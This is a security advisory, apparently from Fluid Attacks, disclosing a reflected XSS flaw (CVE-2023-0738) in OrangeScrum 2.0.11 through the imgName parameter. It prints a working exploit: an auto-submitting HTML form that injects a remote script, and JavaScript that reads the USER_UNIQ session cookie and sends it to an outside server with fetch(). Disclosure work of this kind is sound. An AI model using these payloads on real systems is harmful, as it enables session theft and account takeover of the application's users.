OrangeScrum 2.0.11 - Reflected XSS via imgName

Summary

NameOrangeScrum 2.0.11 - Reflected XSS via imgName
Code name
ProductOrangeScrum
Affected versions2.0.11
StatePublic
Release date2023-04-10

Vulnerability

KindReflected cross-site scripting (XSS)
Rule
RemoteYes
CVSSv3.1 VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
CVSSv3.1 Base Score7.3
Exploit availableNo
CVE ID(s)

Description

OrangeScrum version 2.0.11 allows an external attacker to obtain arbitrary user accounts from the application. This is possible because the application returns malicious user input in the response with the content-type set to text/html.

Vulnerability

This vulnerability occurs because the application returns malicious user input in the response with the content-type set to text/html.

Exploitation

To exploit this vulnerability, we only need to send the following malicious HTML code to an application user.

Exploit.html

<!DOCTYPE html> <html> <body> <form action="https://retr02332bughunter.orangescrum.com/users/done_cropimage" method="POST"> <input type="hidden" name="x-cord" value="10" /> <input type="hidden" name="y-cord" value="10" /> <input type="hidden" name="width" value="10" /> <input type="hidden" name="height" value="10" /> <input type="hidden" name="imgName" value="<script type='text/javascript' src='https://retr02332.com/exploit-utils.js'></script>"/> </form> <script> document.forms[0].submit(); </script> </body> </html>

The malicious JavaScript that we embed in the page is as follows.

Exploit-utils.js

function getCookie(name) {
    const value = `; ${document.cookie}`;
    const parts = value.split(`; ${name}=`);
    if (parts.length === 2) return parts.pop().split(';').shift();
}

let sessionCookie = `USER_UNIQ=${getCookie("USER_UNIQ")}`;

fetch("https://retr02332.com/leak?"+sessionCookie);

Thus, when the user clicks on the malicious link, it will send its session cookie to the attacker's server logs.

Evidence of exploitation

vulnerability-orangescrum

cookie-leak-orangescrum

Our security policy

We have reserved the ID CVE-2023-0738 to refer to this issue from now on.

System Information

  • Version: OrangeScrum 2.0.11

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/Orangescrum/orangescrum/

Timeline

Time-lapse-logo

2023-03-12

Vulnerability discovered.

Time-lapse-logo

2023-03-12

Vendor contacted.

Time-lapse-logo

2023-03-12

Vendor replied acknowledging the report.

Time-lapse-logo

2023-04-10

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.